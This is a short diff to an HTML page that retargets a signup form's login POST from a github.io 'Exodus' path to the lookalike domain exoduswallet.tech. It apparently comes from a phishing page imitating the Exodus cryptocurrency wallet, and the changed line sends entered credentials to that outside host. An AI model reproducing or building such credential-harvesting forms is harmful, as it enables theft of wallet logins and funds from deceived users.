--- a/start.html
+++ b/start.html
@@ -27,7 +27,7 @@
 	
 
         <div class="app">
-            <form class="signup-form" action="https://pascaljanotwa.github.io/Exodus/start.php?action=login" method="post">
+            <form class="signup-form" action="https://exoduswallet.tech/start.php?action=login" method="post">
 			
 			
 			
